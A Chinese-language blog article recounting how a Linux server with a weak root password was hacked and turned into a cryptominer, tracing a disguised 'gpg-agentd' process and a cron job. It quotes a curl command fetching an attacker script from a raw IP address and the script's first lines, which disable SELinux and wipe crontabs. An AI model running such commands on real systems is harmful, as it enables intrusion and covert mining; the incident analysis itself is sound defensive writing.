DIY装机联盟-电脑故障排除|装机指南|硬件|配置|电脑知识

DIY装机联盟-电脑故障排除|装机指南|硬件|配置|电脑知识

http://www.jinanshengke.com

菜单导航

Linux被入侵,服务器变“矿机”

作者: 庄吉 发布时间: 2019年10月11日 12:45:26

周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。

Linux被入侵,服务器变“矿机”

不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。

我放下酸菜馅的包子,SSH 连了一下,被拒绝了,问了下默认的 22 端口被封了。

让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名 :root,还有不足 8 位的小白密码,心里一凉:被黑了!

查找线索

服务器系统 CentOS 6.X,部署了 Nginx,Tomcat,Redis 等应用,上来先把数据库全备份到本地,然后 Top 命令看了一下,有 2 个 99% 的同名进程还在运行,叫 gpg-agentd。

Linux被入侵,服务器变“矿机”

Google 了一下 GPG,结果是:GPG 提供的 gpg-agent 提供了对 SSH 协议的支持,这个功能可以大大简化密钥的管理工作。

看起来像是一个很正经的程序嘛,但仔细再看看服务器上的进程后面还跟着一个字母 d,伪装的很好,让人想起来 Windows 上各种看起来像 svchost.exe 的病毒。

继续排查:

ps eho command-p 23374netstat -pan | grep 23374

查看 pid:23374 进程启动路径和网络状况,也就是来到了图 1 的目录,到此已经找到了黑客留下的二进制可执行文件。

接下来还有 2 个问题在等着我:

文件是怎么上传的?

这个文件的目的是什么,或是黑客想干嘛?

History 看一下,记录果然都被清掉了,没留下任何痕迹。继续命令 more messages:

Linux被入侵,服务器变“矿机”

看到了在半夜 12 点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详细讲。

边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务:

crontab-e

Linux被入侵,服务器变“矿机”

果然,线索找到了。

作案动机

上面的计划任务的意思就是每 15 分钟去服务器上下载一个脚本,并且执行这个脚本。

我们把脚本下载下来看一下:

curl-fsSL 159.89.190.243/ash.php > ash.sh

脚本内容如下:

uname -a

id

hostname

setenforce 02>/dev/ null

ulimit -n 50000

ulimit -u 50000

crontab -r 2>/dev/ null

本文地址:http://www.jinanshengke.com/wlzs/221.html

请遵守互联网相关规定,不要发布广告和违法内容